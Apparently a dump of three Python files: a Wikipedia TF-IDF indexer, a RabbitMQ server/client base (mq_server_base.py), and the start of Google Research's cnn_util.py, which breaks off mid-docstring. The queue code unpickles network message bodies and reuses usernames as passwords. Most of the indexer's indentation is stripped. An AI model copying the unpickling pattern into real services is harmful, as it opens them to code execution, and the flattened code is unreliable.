except (IOError, pickle.UnpicklingError):
sent_detector = None
STOPWORDS = [lemmatizer.lemmatize(t) for t in stopwords.words('english')]
# CONSTANTS AND GLOBAL VARS
LINE_SEPARATOR = u'\u2028'
PARAGRAPH_SEPARATOR = u'\u2029'
# Bad page checks
page_length_limit = 1024
# EXCEPTIONS
class IndexLoadError(Exception):
pass
# CLASSES
class Index(object):
def __init__(self, base_fname, doci_in_memory=False):
self.base_fname = base_fname
check_plain_corpus(base_fname)
if pymongo:
self.load_mongo()
self.load_dict()
self.load_pagi()
if doci_in_memory:
self.load_doci()
else:
self.doci = DocI(self)
self.load_tokc()
self.load_toki()
def load_mongo(self):
self.mongo_conn = pymongo.Connection('localhost', 27017)
self.mongo_db = self.mongo_conn[mongo_db_name(self.base_fname)]
def load_dict(self):
try:
self.dict = (gensim.corpora.dictionary.Dictionary().
load_from_text(self.base_fname + '.dict'))
except IOError:
raise IndexLoadError
def load_pagi(self):
self.pagi = dict()
try:
with codecs.open(self.base_fname + '.pagi', encoding='utf-8') as f:
for line in f:
ID, start, offset = line.split('\t')
self.pagi[int(ID)] = (int(start), int(offset))
if not self.pagi:
raise IndexLoadError
except (IOError, ValueError):
raise IndexLoadError
def load_doci(self):
self.doci = collections.defaultdict(dict)
try:
with codecs.open(self.base_fname + '.doci', encoding='utf-8') as f:
for line in f:
ID, token_counts = line.split('\t', 1)
for token_count in token_counts.split('\t'):
token, count = token_count.split(chr(26))
self.doci[int(ID)][int(token)] = int(count)
if not self.doci:
raise IndexLoadError
except IOError:
raise IndexLoadError
def load_tokc(self):
try:
with open(self.base_fname + '.tokc', mode='rb') as f:
self.tokc = pickle.load(f)
if not self.tokc:
raise IndexLoadError
except (IOError, pickle.UnpicklingError):
raise IndexLoadError
def load_toki(self):
self.toki = TokI(self)
def get_page(self, ID):
def find_page(start):
wiki_dump.seek(start)
pages = plain_page_generator(wiki_dump)
return next(pages)
with open(self.base_fname + '.txt', mode='rb') as wiki_dump:
try:
iterator = iter(ID)
except TypeError:
start, offset = self.pagi[ID]
return find_page(start)
else:
pages = []
for page in ID:
start, offset = self.pagi[page]
pages.append(find_page(start))
return pages
def union(self, terms):
terms = list(terms)
try:
# Check that each term is a number (token-ID).
_ = [x + 1 for x in terms]
except TypeError:
# They're not numbers, so we need to convert them to token-IDs.
terms = [self.dict.token2id.get(term, None) for term in terms]
            terms = [x for x in terms if x is not None]
pages = set()
if pymongo:
pages.update(self.toki[terms])
else:
for term in terms:
if term in self.toki:
ID = self.toki[term]
pages.update(ID)
return pages
def intersect(self, terms):
terms = list(terms)
try:
# Check that each term is a number (token-ID).
_ = [x + 1 for x in terms]
except TypeError:
# They're not numbers, so we need to convert them to token-IDs.
terms = [self.dict.token2id.get(term, None) for term in terms]
            terms = [x for x in terms if x is not None]
pages = set(self.toki[terms.pop()])
for term in terms:
if term in self.toki:
ID = self.toki[term]
pages.intersection_update(ID)
return pages
def ranked(self, terms):
terms = list(terms)
try:
# Check that each term is a number (token-ID).
_ = [x + 1 for x in terms]
except TypeError:
# They're not numbers, so we need to convert them to token-IDs.
terms = [self.dict.token2id.get(term, None) for term in terms]
            terms = [x for x in terms if x is not None]
q_tfidf = self.query_tfidf(terms)
pages = self.union(terms)
ranked_pages = dict()
for ID in pages:
# Calculate document TF-IDF
d_tfidf = dict()
token_counts = self.doci[ID]
max_count = max(token_counts.itervalues())
for term in token_counts:
# TF: Raw frequency divided by the maximum raw frequency
# of any term in the document.
tf = token_counts[term] / max_count
                # IDF: Log of the total number of documents in the corpus
                # divided by the number of documents where the term appears.
idf = math.log(len(self.doci) / self.dict.dfs[term])
d_tfidf[term] = tf * idf
# Calculate inner product
inner_product = 0
for term in terms:
if term in token_counts:
inner_product += q_tfidf[term] * d_tfidf[term]
# Calculate query length
query_length = 0
for term in q_tfidf:
query_length += q_tfidf[term] ** 2
query_length = math.sqrt(query_length)
# Calculate document length
doc_length = 0
for term in d_tfidf:
doc_length += d_tfidf[term] ** 2
doc_length = math.sqrt(doc_length)
# Calculate the cosine similarity
cosine_sim = inner_product / (query_length * doc_length)
ranked_pages[ID] = cosine_sim
ranked_pages = sorted(ranked_pages.iteritems(),
key=operator.itemgetter(1), reverse=True)
return ranked_pages
def query_tfidf(self, terms):
token_count = collections.defaultdict(int)
try:
terms = [self.dict.token2id[term] for term in terms]
except KeyError:
pass
for term in terms:
token_count[term] += 1
max_count = max(token_count.itervalues())
return {term: token_count[term] / max_count for term in token_count}
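# Index.ranked() above scores each candidate page with the cosine similarity
# between the query's TF-IDF vector and the document's TF-IDF vector, where
# TF is a raw count divided by the largest count in that document (or query)
# and IDF is log(total documents / documents containing the term).  The
# helper below is a minimal standalone sketch of the same cosine computation
# over sparse {token_id: weight} dicts; it is not called by the Index class.
def _cosine_similarity_sketch(q_tfidf, d_tfidf):
    """Cosine similarity of two sparse term-weight vectors (sketch only)."""
    inner_product = sum(q_tfidf[t] * d_tfidf[t] for t in q_tfidf
                        if t in d_tfidf)
    query_length = math.sqrt(sum(w ** 2 for w in q_tfidf.itervalues()))
    doc_length = math.sqrt(sum(w ** 2 for w in d_tfidf.itervalues()))
    if query_length == 0 or doc_length == 0:
        return 0.0
    return inner_product / (query_length * doc_length)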
class DocI(object):
def __init__(self, index):
self.index = index
        # Make sure the file can be opened and at least the first line is parsable.
try:
with codecs.open(self.index.base_fname + '.doci',
encoding='utf-8') as f:
line = f.readline()
ID, token_counts = line.split('\t', 1)
for token_count in token_counts.split('\t'):
token, count = token_count.split(chr(26))
ID, token, count = int(ID), int(token), int(count)
except IOError:
raise IndexLoadError
def __getitem__(self, ID):
"""Retrieve the dictionary result of: {page.ID -> page.token_count}"""
counts = dict()
with codecs.open(self.index.base_fname + '.doci',
encoding='utf-8') as f:
start, offset = self.index.pagi[ID]
f.seek(offset)
line = f.readline()
ID, token_counts = line.split('\t', 1)
for token_count in token_counts.split('\t'):
token, count = token_count.split(chr(26))
counts[int(token)] = int(count)
return counts
def __len__(self):
"""Returns the equivalent length of self.index.pagi"""
return len(self.index.pagi)
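# A '.doci' line stores one page's token counts as tab-separated fields: the
# page ID first, then one "token_id<SUB>count" pair per field, where <SUB> is
# the ASCII substitute character chr(26).  The helpers below sketch that
# round trip for illustration only; DocI itself seeks straight to a page's
# line using the byte offset recorded in the '.pagi' index.
def _encode_doci_line_sketch(page_id, token_counts):
    """Encode {token_id: count} as one '.doci' line (sketch only)."""
    fields = [str(page_id)]
    fields += [chr(26).join([str(token), str(count)])
               for token, count in token_counts.items()]
    return '\t'.join(fields) + '\n'


def _decode_doci_line_sketch(line):
    """Decode one '.doci' line back into (page_id, {token_id: count})."""
    page_id, token_counts = line.rstrip('\n').split('\t', 1)
    counts = {}
    for token_count in token_counts.split('\t'):
        token, count = token_count.split(chr(26))
        counts[int(token)] = int(count)
    return int(page_id), counts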
class TokI(object):
"""Wrapper class around the .toki index file; allows for toki[token].
This class allows access to the toki {token -> set(page.IDs)} whether
the underlying index is from a MongoDB or a defaultdict loaded entirely
into memory.
"""
def __init__(self, index):
"""Initialize the TokI object from a MongoDB or load from disk."""
self.index = index
if pymongo:
if 'toki' in self.index.mongo_db.collection_names():
self.mongo_toki = self.index.mongo_db['toki']
if self.mongo_toki.count() == 0:
raise IndexLoadError
else:
raise IndexLoadError
else:
# Load into memory (not suitable for large corpora!)
try:
with open(self.index.base_fname + '.toki', mode='rb') as f:
self.toki = pickle.load(f)
if not self.toki:
raise IndexLoadError
except (IOError, pickle.UnpicklingError):
raise IndexLoadError
def __getitem__(self, token):
"""Retrieve a token's set of page IDs: {token -> set(page.IDs)}"""
if pymongo:
try:
iter(token)
except TypeError:
token = [token]
results = set()
for result in self.mongo_toki.find({'tok': {'$in': token}}):
results.add(result['_id'])
if results:
return results
else:
print 'ERROR: bad token = {}'.format(token)
raise KeyError
else:
return self.toki[token]
def __contains__(self, key):
"""Checks if key exists in the index."""
if pymongo:
return self.mongo_toki.find_one({'tok': key}) is not None
else:
return key in self.toki
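# Usage sketch for TokI (illustrative only; assumes index files were built
# for a corpus whose base filename is 'corpus'):
#
#     index = Index('corpus')
#     page_ids = index.toki[42]           # pages containing token-ID 42
#     if pymongo:
#         page_ids = index.toki[[42, 7]]  # the Mongo branch also accepts a
#                                         # list and returns the union
#
# Note the asymmetry: only the MongoDB-backed branch of __getitem__ accepts a
# list of token IDs; the in-memory branch looks up a single token ID.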
# FUNCTIONS
def check_plain_corpus(base_fname):
"""Attempts to make sure the plain-text corpus is available."""
try:
with open(base_fname + '.txt') as wiki_dump:
pages = plain_page_generator(wiki_dump)
if not next(pages):
raise IndexLoadError
except IOError:
raise IndexLoadError
def mongo_db_name(base_fname):
"""Use the corpus filename to create the database name."""
fname = base_fname.replace('\\', '/').rsplit('/', 1)[1]
fname = fname.replace('.', '_')
return fname
def regularize(tokens):
"""Returns a copy of a regularized version of the token list."""
tokens = list(tokens)
for i, token in enumerate(tokens):
# Normalize text by case folding
token = token.lower()
# Lemmatize (birds -> bird)
token = lemmatizer.lemmatize(token)
# Stopword and punctuation removal
if token in STOPWORDS or token in string.punctuation:
token = None
# Done; update value in list
tokens[i] = token
# Remove empty tokens
tokens = [x for x in tokens if x is not None]
return tokens
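# Example for regularize() (illustrative; the exact output depends on the
# installed NLTK stopword and WordNet data):
#
#     >>> regularize(['The', 'birds', 'were', 'flying', '.'])
#     ['bird', 'flying']
#
# 'The' and 'were' are dropped as stopwords, '.' as punctuation, and 'birds'
# is lemmatized to 'bird'; 'flying' is kept because the WordNet lemmatizer
# treats tokens as nouns by default.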
def first_pass_worker(taskq, doneq):
"""Processes pages to make a plain-text corpus from the original dump."""
logger = logging.getLogger('worker')
done_buff = []
try:
while True:
chunk = taskq.get()
if chunk is None:
return
for page in chunk:
page.preprocess()
if len(page.text) < page_length_limit:
continue
# Need to get tokens so we can build our Dictionary
page.regularize_text()
done_buff.append(page)
doneq.put(done_buff)
done_buff = []
finally:
doneq.put(None)
def second_pass_worker(taskq, doneq):
"""Counts tokens from the plain-text corpus to create an index."""
logger = logging.getLogger('worker')
done_buff = []
try:
while True:
chunk = taskq.get()
if chunk is None:
return
for page in chunk:
page.regularize_text()
page.count_tokens()
done_buff.append(page)
doneq.put(done_buff)
done_buff = []
finally:
doneq.put(None)
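# Both *_worker functions above follow the same poison-pill protocol: pull a
# chunk of pages from taskq, push the processed chunk onto doneq, treat a
# None task as the signal to stop, and always emit a final None on doneq so
# the single writer process can count how many workers have finished.  The
# function below is a minimal generic sketch of that protocol and is not
# used by this module.
def _poison_pill_worker_sketch(taskq, doneq, process_chunk):
    """Generic poison-pill worker loop (sketch only)."""
    try:
        while True:
            chunk = taskq.get()
            if chunk is None:
                return
            doneq.put(process_chunk(chunk))
    finally:
        # Always signal completion, even on error or early return.
        doneq.put(None)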
def first_pass_writer(doneq, wiki_location):
"""Extracts the Dictionary (vocabulary) and writes plain-text corpus."""
pill_count = 0 # termination condition (poison pill)
dictionary = gensim.corpora.dictionary.Dictionary()
try:
with codecs.open(wiki_location + '.txt',
mode='w',
encoding='utf-8') as txt:
# Begin processing chunks as they come in.
while True:
chunk = doneq.get()
if chunk is None:
pill_count += 1
if pill_count == NUMBER_OF_PROCESSES:
return
else:
continue
for page in chunk:
# Send all tokens from document to Dictionary
all_tokens = []
para_sent = []
for para in page.paragraphs:
for sentence in para.sentence_tokens:
all_tokens.extend(sentence)
sent = LINE_SEPARATOR.join(para.sentences)
para_sent.append(sent)
para_sent = PARAGRAPH_SEPARATOR.join(para_sent)
dictionary.doc2bow(all_tokens, allow_update=True)
# page.text = unicode(page.text)
txt.write('\t'.join([str(page.ID), page.title, para_sent])
+ '\n')
finally:
# Save token indices
# TODO(bwbaugh): Make the filtering of the dictionary configurable.
# dictionary.filter_extremes(no_below=2, no_above=0.9)
dictionary.save_as_text(wiki_location + '.dict')
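# gensim note: Dictionary.doc2bow(tokens, allow_update=True) both converts a
# token list into (token_id, count) pairs and grows the vocabulary, which is
# what lets first_pass_writer() build the '.dict' file in a single streaming
# pass.  Illustrative sketch only (not used by this module):
#
#     d = gensim.corpora.dictionary.Dictionary()
#     d.doc2bow([u'cat', u'sat', u'cat'], allow_update=True)
#     d.save_as_text('corpus.dict')   # same format load_from_text() reads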
def second_pass_writer(doneq, wiki_location):
"""Writes various index files for fast searching and retrieval of pages."""
if pymongo:
mongo_conn = pymongo.Connection('localhost', 27017)
mongo_db = mongo_conn[mongo_db_name(wiki_location)]
mongo_toki = mongo_db['toki']
# Delete any existing data
mongo_toki.drop()
else:
token_docs = collections.defaultdict(set)
token_counts = collections.defaultdict(int)
dictionary = (gensim.corpora.dictionary.Dictionary().
load_from_text(wiki_location + '.dict'))
try:
with codecs.open(wiki_location + '.pagi',
mode='w',
encoding='utf-8') as pagi,\
codecs.open(wiki_location + '.doci',
mode='w',
encoding='utf-8') as doci:
# Begin processing chunks as they come in.
pill_count = 0 # termination condition (poison pill)
while True:
chunk = doneq.get()
if chunk is None:
pill_count += 1
if pill_count == NUMBER_OF_PROCESSES:
return
else:
continue
if pymongo:
# Used to store pages from the chunk for a batch insert.
mongo_list = []
for page in chunk:
# Convert token from a string to an integer ID, and
# remove tokens that don't appear in our Dictionary.
page.token_count = [(dictionary.token2id[t], c) for t, c in
page.token_count if t in
dictionary.token2id]
pagi.write('\t'.join([str(page.ID).ljust(1),
str(page.start).ljust(1),
str(doci.tell()).ljust(1)]) + '\n')
doci.write('\t'.join([str(page.ID)] +
[chr(26).join([str(k), str(v)]) for
k, v in page.token_count]) +
'\n')
if pymongo:
token_list = []
for token, count in page.token_count:
                            # Get the set of tokens that appear in the page.
token_list.append(token)
token_counts[token] += int(count)
mongo_list.append((page.ID, token_list))
else:
for token, count in page.token_count:
token_docs[token].add(page.ID)
token_counts[token] += int(count)
for f in (pagi, doci):
f.flush()
if pymongo:
# Batch insert all pages from this chunk.
mongo_toki.insert([{'_id': ID, 'tok': token_list} for
ID, token_list in mongo_list])
finally:
# Save token indices
with open(wiki_location + '.tokc', mode='wb') as tokc:
pickle.dump(token_counts, tokc, protocol=pickle.HIGHEST_PROTOCOL)
if pymongo:
mongo_toki.ensure_index('tok') # blocking
mongo_conn.disconnect()
else:
with open(wiki_location + '.toki', mode='wb') as toki:
pickle.dump(token_docs, toki, protocol=pickle.HIGHEST_PROTOCOL)
def create_punkt_sent_detector(fname, progress_count, max_pages=25000):
"""Makes a pass through the corpus to train a Punkt sentence segmenter."""
logger = logging.getLogger('create_punkt_sent_detector')
punkt = nltk.tokenize.punkt.PunktTrainer()
logger.info("Training punkt sentence detector")
wiki_size = os.path.getsize(fname)
page_count = 0
try:
with open(fname, mode='rb') as wiki_dump:
pages = page_generator(wiki_dump)
for page in pages:
page.preprocess()
punkt.train(page.text, finalize=False, verbose=False)
page_count += 1
if page_count == max_pages:
break
if page_count % progress_count == 0:
print(page_count, page.start,
(page.start / wiki_size * 100),
# taskq.qsize() if taskq is not None else 'n/a',
# doneq.qsize() if doneq is not None else 'n/a',
page.ID, page.title)
except KeyboardInterrupt:
        print('KeyboardInterrupt: Stopping the reading of the dump early!')
    logger.info('Now finalizing Punkt training.')
punkt.finalize_training(verbose=True)
learned = punkt.get_params()
sbd = nltk.tokenize.punkt.PunktSentenceTokenizer(learned)
with open(PUNKT_FNAME, mode='wb') as f:
pickle.dump(sbd, f, protocol=pickle.HIGHEST_PROTOCOL)
def first_pass(fname, progress_count=None, max_pages=None):
"""Extract a Dictionary and create plain-text version of corpus."""
logger = logging.getLogger('first_pass')
wiki_size = os.path.getsize(fname)
# Page task queues for parallel processing
taskq = multiprocessing.Queue(MAX_QUEUE_ITEMS)
doneq = multiprocessing.Queue(MAX_QUEUE_ITEMS)
# Start worker processes
logger.info('Starting workers')
workers = []
for i in range(NUMBER_OF_PROCESSES):
p = multiprocessing.Process(target=first_pass_worker,
args=(taskq, doneq))
p.start()
workers.append(p)
# Start log writer process
p = multiprocessing.Process(target=first_pass_writer, args=(doneq, fname))
p.start()
workers.append(p)
# Process XML dump
    logger.info('Beginning XML parse')
wiki_size = os.path.getsize(fname)
page_count = 0
task_buff = []
try:
with open(fname, mode='rb') as wiki_dump:
pages = page_generator(wiki_dump)
for page in pages:
task_buff.append(page)
if len(task_buff) == CHUNK_SIZE:
taskq.put(task_buff)
task_buff = []
page_count += 1
if page_count == max_pages:
break
if page_count % progress_count == 0:
print(page_count, page.start,
(page.start / wiki_size * 100),
taskq.qsize(), doneq.qsize(),
page.ID, page.title)
except KeyboardInterrupt:
        print('KeyboardInterrupt: Stopping the reading of the dump early!')
finally:
# Flush task buffer
taskq.put(task_buff)
task_buff = []
# Tell child processes to stop
for i in range(NUMBER_OF_PROCESSES):
taskq.put(None)
logger.info('All done! Processed %s total pages.', page_count)
# Wait for all child processes to stop (especially that writer!)
for p in workers:
p.join()
# Main function of module
def create_index(fname, progress_count=None, max_pages=None):
"""Processes a corpus to create a corresponding Index object."""
logger = logging.getLogger('create_index')
if sent_detector is None:
create_punkt_sent_detector(fname=fname,
progress_count=CHUNK_SIZE,
max_pages=min(25000, max_pages))
# Set params
if progress_count is None:
progress_count = CHUNK_SIZE * NUMBER_OF_PROCESSES
# First pass, create Dictionary and plain-text version of corpus.
try:
dictionary = (gensim.corpora.dictionary.Dictionary().
load_from_text(fname + '.dict'))
if not dictionary or check_plain_corpus(fname):
raise IndexLoadError
except (IOError, IndexLoadError):
first_pass(fname, progress_count, max_pages)
else:
del dictionary
# Page task queues for parallel processing
taskq = multiprocessing.Queue(MAX_QUEUE_ITEMS)
doneq = multiprocessing.Queue(MAX_QUEUE_ITEMS)
# Start worker processes
logger.info('Starting workers')
workers = []
for i in range(NUMBER_OF_PROCESSES):
p = multiprocessing.Process(target=second_pass_worker,
args=(taskq, doneq))
p.start()
workers.append(p)
# Start log writer process
p = multiprocessing.Process(target=second_pass_writer, args=(doneq, fname))
p.start()
workers.append(p)
# We are now working with the plain-text corpus generated in the 1st pass.
fname += '.txt'
wiki_size = os.path.getsize(fname)
# Process XML dump
    logger.info('Beginning plain-text parse')
wiki_size = os.path.getsize(fname)
page_count = 0
task_buff = []
try:
with open(fname, mode='rb') as wiki_dump:
pages = plain_page_generator(wiki_dump)
for page in pages:
task_buff.append(page)
if len(task_buff) == CHUNK_SIZE:
taskq.put(task_buff)
task_buff = []
page_count += 1
if page_count == max_pages:
break
if page_count % progress_count == 0:
print(page_count, page.start,
(page.start / wiki_size * 100),
taskq.qsize(), doneq.qsize(),
page.ID, page.title)
except KeyboardInterrupt:
        print('KeyboardInterrupt: Stopping the reading of the dump early!')
finally:
# Flush task buffer
taskq.put(task_buff)
task_buff = []
# Tell child processes to stop
for i in range(NUMBER_OF_PROCESSES):
taskq.put(None)
logger.info('All done! Processed %s total pages.', page_count)
# Wait for all child processes to stop (especially that writer!)
for p in workers:
p.join()
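# Usage sketch (not part of the original module; the dump path below is hypothetical):
# create_index() trains the Punkt model if needed, then runs the two parallel passes
# above, producing the .txt, .dict, .pagi, .doci and .tokc/.toki files next to the dump.
#
#     logging.basicConfig(level=logging.INFO)
#     create_index('enwiki-latest-pages-articles.xml', max_pages=100000)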
# PROJECT MODULE IMPORTS
|
mq_server_base.py
|
import os
import pika
from multiprocessing.pool import ThreadPool
import threading
import pickle
from functools import partial
from typing import Tuple
from queue import Queue
import time
from abc import ABCMeta,abstractmethod
import sys
sys.setrecursionlimit(100000)
import functools
import termcolor
import datetime
print=functools.partial(print,flush=True)
tostring=lambda *args:' '.join(map(str,args))
printred=lambda *args,**kwargs:termcolor.cprint(tostring(*args),color='red',flush=True,**kwargs)
printgreen=lambda *args,**kwargs:termcolor.cprint(tostring(*args),color='green',flush=True,**kwargs)
def info_prefix():
    return '[{} info]'.format(datetime.datetime.now())
class MessageQueueServerBase(metaclass=ABCMeta):
_rmq_server_addr = None
_username=None
_request_pipe_name = None
_response_pipe_name = None
_eval_callback = None
_nr_threads = None
heartbeat=0
@property
def nr_threads(self):
return self._nr_threads
@nr_threads.setter
def nr_threads(self, v):
self._nr_threads = v
@abstractmethod
    def eval(self, content):
pass
def __init__(self, rmq_server_addr:str, port:int, username:str, request_pipe_name:str, response_pipe_name:str):
self._rmq_server_addr = rmq_server_addr
self._port=port
self._username=username
self._request_pipe_name = request_pipe_name
self._response_pipe_name = response_pipe_name
def listen(self, reset_pipe=False):
assert self.nr_threads is not None
if reset_pipe:
printgreen(info_prefix(),'Reset existing pipes.')
print('request_pipe_name:',self._request_pipe_name)
print('response_pipe_name:',self._response_pipe_name)
print()
self._clear_pipe(self._request_pipe_name)
self._clear_pipe(self._response_pipe_name)
threads = ThreadPool(self.nr_threads)
threads.map(self._listen_thread, range(self.nr_threads))
def _clear_pipe(self, pipe_name):
conn = pika.BlockingConnection(pika.ConnectionParameters(host=self._rmq_server_addr,port=self._port,heartbeat=self.heartbeat,blocked_connection_timeout=None,virtual_host='/',credentials=pika.PlainCredentials(self._username,self._username)))
channel = conn.channel()
channel.queue_delete(queue=pipe_name)
channel.close()
conn.close()
def _listen_thread(self, thread_idx):
conn = pika.BlockingConnection(pika.ConnectionParameters(host=self._rmq_server_addr,port=self._port,heartbeat=self.heartbeat,blocked_connection_timeout=None,virtual_host='/',credentials=pika.PlainCredentials(self._username,self._username)))
channel_request = conn.channel()
channel_request.queue_declare(queue=self._request_pipe_name)
channel_response = conn.channel()
channel_response.queue_declare(queue=self._response_pipe_name)
def fail(*args,**kwargs):
print('args:',args)
print('kwargs:',kwargs)
raise NotImplementedError
channel_response.add_on_cancel_callback(fail)
channel_request.basic_qos(prefetch_count=1)
channel_request.basic_consume(partial(self._request_callback, channel_response=channel_response), queue=self._request_pipe_name)
printgreen(info_prefix(),'Listening ({})'.format(thread_idx))
print()
channel_request.start_consuming()
def _request_callback(self, cur_channel, frame, properties, body, channel_response):
data = pickle.loads(body)
assert(len(data) == 2)
key = data[0]
content = data[1]
printgreen(info_prefix(),'receive key:',key)
print('content:',content)
print('waiting for evaluation...')
print()
try:
result = self.eval(content)
except:
import traceback
traceback.print_exc()
time.sleep(10)
os._exit(1)
print()
            return {'status': 'uncaught error'}
#assert isinstance(result,dict)
printgreen(info_prefix(),'finish key:',key)
print('content:',content)
print('result:',result)
print()
del content
obj = pickle.dumps((key, result))
if cur_channel.is_closed:
raise NotImplementedError
printgreen(info_prefix(),'return result')
channel_response.basic_publish(exchange='', routing_key=self._response_pipe_name, body=obj)
cur_channel.basic_ack(delivery_tag=frame.delivery_tag)
def run(self,threads,*,reset_pipe=False):
self.nr_threads=threads
self.listen(reset_pipe=reset_pipe)
class MessageQueueClientBase(metaclass=ABCMeta):
_rmq_server_addr = None
_username=None
_request_pipe_name = None
_response_pipe_name = None
_channel_request = None
_buffer = None
_buffer_queue = None
_data_idx = None
_thread=None
heartbeat=0
def __init__(self, rmq_server_addr:str, port:int, username:str, request_pipe_name:str, response_pipe_name:str):
self._rmq_server_addr = rmq_server_addr
self._port=port
self._username=username
self._request_pipe_name = request_pipe_name
self._response_pipe_name = response_pipe_name
self._buffer = dict()
self._buffer_queue = Queue()
self._data_idx = 0
def save(self):
return {'buffer':self._buffer}
def load(self,info):
self._buffer=info['buffer']
def connect(self, reset_pipe=False):
conn = pika.BlockingConnection(pika.ConnectionParameters(host=self._rmq_server_addr,port=self._port,heartbeat=self.heartbeat,blocked_connection_timeout=None,virtual_host='/',credentials=pika.PlainCredentials(self._username,self._username)))
self._conn=conn
self._channel_request = conn.channel()
if reset_pipe:
self._channel_request.queue_delete(queue=self._request_pipe_name)
self._channel_request.queue_declare(queue=self._request_pipe_name)
def start_consuming():
conn = pika.BlockingConnection(pika.ConnectionParameters(host=self._rmq_server_addr,port=self._port,heartbeat=self.heartbeat,blocked_connection_timeout=None,virtual_host='/',credentials=pika.PlainCredentials(self._username,self._username)))
channel_response = conn.channel()
if reset_pipe:
                channel_response.queue_delete(queue=self._response_pipe_name)
channel_response.queue_declare(queue=self._response_pipe_name)
channel_response.basic_consume(self._fetch_response_callback, queue=self._response_pipe_name)
channel_response.start_consuming()
if self._thread is not None:
#self._thread._stop()
self._thread=None
thread = threading.Thread(target=start_consuming)
thread.start()
self._thread=thread
def _fetch_response_callback(self, cur_channel, frame, properties, body):
#print('callback')
data = pickle.loads(body)
assert len(data) == 2
printgreen(info_prefix(),'receive key:',data[0])
print('result:',data[1])
print()
#print(id(self),type(self))
self._buffer_queue.put(data)
cur_channel.basic_ack(delivery_tag=frame.delivery_tag)
@abstractmethod
def send(self, content, *,key:str=None) -> str:
self._data_idx += 1
key = key or "{}-{}".format(self._data_idx, time.time())
printgreen(info_prefix(),'send key',key)
print('content:',content)
print()
obj = pickle.dumps((key, content))
while True:
try:
self._channel_request.basic_publish(exchange='', routing_key=self._request_pipe_name, body=obj)
break
except:
import traceback
traceback.print_exc()
time.sleep(10)
print('Send failed, reconnecting >>>>>')
print('reconnect')
self.connect()
return key
def get(self, key:str, *, timeout) -> str:
printgreen(info_prefix(),'try to get key:',key)
if key in self._buffer:
data = self._buffer[key]
del self._buffer[key]
return data
#print ('buffer:',self._buffer)
#print(id(self),type(self))
begin_time=time.time()
while True:
#assert time.time()-begin_time<timeout
cur_key, content = self._buffer_queue.get(timeout=timeout)
#print('data:',cur_key,content)
if cur_key == key:
return content
else:
self._buffer[cur_key] = content
def get_retry(self,info,*,key,timeout):
while True:
try:
if key is None:
key=self.send(info)
print('new key')
                res = self.get(key, timeout=timeout)
return res
except:
import traceback
traceback.print_exc()
time.sleep(1)
key=None
if __name__ == '__main__':
pass
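# Minimal sketch (not part of the original module; the broker address, credentials and
# pipe names below are hypothetical). A concrete server overrides eval(); a concrete
# client only needs to delegate to the base-class send():
#
#     class EchoServer(MessageQueueServerBase):
#         def eval(self, content):
#             return {'status': 'ok', 'echo': content}
#
#     class EchoClient(MessageQueueClientBase):
#         def send(self, content, *, key=None):
#             return super().send(content, key=key)
#
#     server = EchoServer('localhost', 5672, 'guest', 'req_pipe', 'resp_pipe')
#     server.run(threads=4, reset_pipe=True)  # blocks, consuming requests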
|
cnn_util.py
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for CNN benchmarks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import threading
import numpy as np
import tensorflow.compat.v1 as tf
def tensorflow_version_tuple():
v = tf.__version__
major, minor, patch = v.split('.')
return (int(major), int(minor), patch)
def tensorflow_version():
vt = tensorflow_version_tuple()
return vt[0] * 1000 + vt[1]
def log_fn(log):
print(log)
def roll_numpy_batches(array, batch_size, shift_ratio):
"""Moves a proportion of batches from start to the end of the array.
This function moves a proportion of batches, specified by `shift_ratio`, from
the starts of the array to the end. The number of batches moved is rounded
down to the nearest integer. For example,
```
roll_numpy_batches([1, 2, 3, 4, 5, 6], 2, 0.34) == [3, 4, 5, 6, 1, 2]
```
Args:
array: A Numpy array whose first dimension is the batch dimension.
batch_size: The batch size.
shift_ratio: Proportion of batches to move from the start of the array to
the end of the array.
Returns:
A new Numpy array, with a proportion of the batches at the start of `array`
moved to the end.
"""
num_items = array.shape[0]
assert num_items % batch_size == 0
num_batches = num_items // batch_size
starting_batch = int(num_batches * shift_ratio)
starting_item = starting_batch * batch_size
return np.roll(array, -starting_item, axis=0)
# For Python 2.7 compatibility, we do not use threading.Barrier.
class Barrier(object):
"""Implements a lightweight Barrier.
Useful for synchronizing a fixed number of threads at known synchronization
points. Threads block on 'wait()' and simultaneously return once they have
all made that call.
# Implementation adopted from boost/thread/barrier.hpp
"""
def __init__(self, parties):
"""Create a barrier, initialised to 'parties' threads."""
self.cond = threading.Condition(threading.Lock())
self.parties = parties
# Indicates the number of waiting parties.
self.waiting = 0
    # generation is needed to deal with spurious wakeups. If self.cond.wait()
    # wakes up for other reasons, generation will force it to go back to wait().
self.generation = 0
self.broken = False
def wait(self):
"""Wait for the barrier."""
with self.cond:
# Check if the barrier has been disabled or not.
if self.broken:
return
gen = self.generation
self.waiting += 1
if self.waiting == self.parties:
self.waiting = 0
self.generation += 1
self.cond.notify_all()
# loop because of spurious wakeups
while gen == self.generation:
self.cond.wait()
# TODO(huangyp): Remove this method once we find a way to know which step
# is the last barrier.
def abort(self):
"""Clear existing barrier and disable this barrier."""
with self.cond:
if self.waiting > 0:
self.generation += 1
self.cond.notify_all()
self.broken = True
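# Usage sketch (not part of the original module): two threads meeting at the barrier.
# When _barrier_demo() is called, both 'before' lines print before either 'after' line.
def _barrier_demo():
  barrier = Barrier(2)

  def task(name):
    log_fn('%s before wait' % name)
    barrier.wait()  # blocks until both parties have called wait()
    log_fn('%s after wait' % name)

  demo_threads = [threading.Thread(target=task, args=(n,)) for n in ('a', 'b')]
  for t in demo_threads:
    t.start()
  for t in demo_threads:
    t.join()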
class ImageProducer(object):
"""An image producer that puts images into a staging area periodically.
This class is useful for periodically running a set of ops, `put_ops` on a
different thread every `batch_group_size` steps.
The notify_image_consumption() method is used to increment an internal counter
so that every `batch_group_size` times it is called, `put_ops` is executed. A
barrier is placed so that notify_image_consumption() will block until
the previous call to `put_ops` has been executed.
The start() method is used to start the thread that runs `put_ops`.
The done() method waits until the last put_ops is executed and stops the
thread.
The purpose of this class is to fill an image input pipeline every
`batch_group_size` steps. Suppose `put_ops` supplies `batch_group_size` images
to the input pipeline when run, and that every step, 1 batch of images is
consumed. Then, by calling notify_image_consumption() every step, images are
supplied to the input pipeline at the same amount they are consumed.
Example usage:
```
